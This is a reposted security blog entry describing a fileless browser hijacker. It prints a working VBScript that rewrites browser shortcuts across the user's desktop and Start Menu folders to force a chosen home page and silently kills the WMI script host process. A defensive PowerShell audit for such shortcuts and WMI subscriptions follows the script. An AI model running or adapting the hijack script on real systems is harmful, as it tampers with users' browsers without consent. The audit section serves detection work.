A VBS script to lock the browser home page - Fileless Browser Hijacker

Posted on 2016-5-3 14:02:07
From:

http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
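0x00 Introduction
A VBS script that, when executed, modifies the home page of the common browsers on the current system.
Invoking this script on a schedule through WMI achieves a fileless hijack of the browser home page.
The original article already gives defense and detection methods, so they are omitted here.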
---
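0x01 Application
Technique is neither good nor bad.
Having learned this trick, we can equally use it to lock our own browser.
The VBS code is as follows; the home page is locked to http://www.baidu.com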
```vbscript
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
' URL written into the arguments of every browser shortcut
Const link = "http://www.baidu.com"
' Executable names that are treated as browsers
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
' Lookup table keyed by the lower-cased executable name
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
    BrowserDic.Add LCase(browser), browser
Next
' Folders searched for .lnk files (indices 0..11; per-user paths use the account name "a" as in the post)
Dim FoldersDic(11)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\a\Desktop"
FoldersDic(5) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\a\AppData\Roaming"
FoldersDic(9) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
    For Each file In fso.GetFolder(FoldersDic(i)).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            ' File name of the shortcut target, e.g. chrome.exe
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If BrowserDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                ' Clear the read-only attribute so the shortcut can be saved
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
Next
' Terminate scrcons.exe (the WMI script consumer host) with a hidden window
CreateObject("wscript.shell").Run "cmd /c taskkill /f /im scrcons.exe", 0
```

After execution, the home page of the browsers on the system is changed, as shown in the figure:
[Figure: 2016050312093330600.jpg]

---
For testing only. No copying homework; use at your own risk.
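
A read-only audit for the two artifacts this post involves, as an added example that is not part of the original post: browser shortcuts whose arguments contain a URL, and permanent WMI event subscriptions with a script consumer (scrcons.exe, which the script kills, is the host process for ActiveScriptEventConsumer). The folder list and the URL pattern are assumptions; run it from an elevated PowerShell so that root\subscription is readable.

```powershell
# Added audit example, not from the original post. Nothing is modified.
# Browser executable names are the ones listed in the script above.
$browsers = 'iexplore.exe','chrome.exe','firefox.exe','360chrome.exe','360se.exe',
            'sogouexplorer.exe','opera.exe','safari.exe','maxthon.exe','ttraveler.exe',
            'theworld.exe','baidubrowser.exe','liebao.exe','qqbrowser.exe'

# Shortcut locations resolved for the current user instead of hard-coded paths
# (assumption: the desktop, Start Menu and Quick Launch trees, searched recursively).
$folders = @(
    [Environment]::GetFolderPath('CommonDesktopDirectory'),
    [Environment]::GetFolderPath('CommonStartMenu'),
    [Environment]::GetFolderPath('DesktopDirectory'),
    [Environment]::GetFolderPath('StartMenu'),
    (Join-Path $env:APPDATA 'Microsoft\Internet Explorer\Quick Launch')
) | Where-Object { $_ -and (Test-Path -LiteralPath $_) }

$shell = New-Object -ComObject WScript.Shell

# 1. Browser shortcuts that carry a URL in their arguments.
$hits = Get-ChildItem -LiteralPath $folders -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)   # opens the existing .lnk; never saved
        $exe = [IO.Path]::GetFileName($lnk.TargetPath)
        # -contains and -match are case-insensitive in PowerShell
        if ($browsers -contains $exe -and $lnk.Arguments -match '\b(https?://|www\.)') {
            [pscustomobject]@{
                Shortcut  = $_.FullName
                Target    = $lnk.TargetPath
                Arguments = $lnk.Arguments
            }
        }
    }
$hits | Format-List

# 2. Permanent WMI event subscriptions: filters, script consumers and their bindings.
foreach ($class in '__EventFilter','ActiveScriptEventConsumer','__FilterToConsumerBinding') {
    Get-CimInstance -Namespace root\subscription -ClassName $class -ErrorAction SilentlyContinue |
        Select-Object @{ n = 'Class'; e = { $class } }, Name, Query,
                      ScriptingEngine, ScriptText, Filter, Consumer |
        Format-List
}
```

A shortcut listed in part 1 is not necessarily hostile, since some users add a start URL on purpose; a script consumer in part 2 whose ScriptText rewrites shortcuts is the stronger signal.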
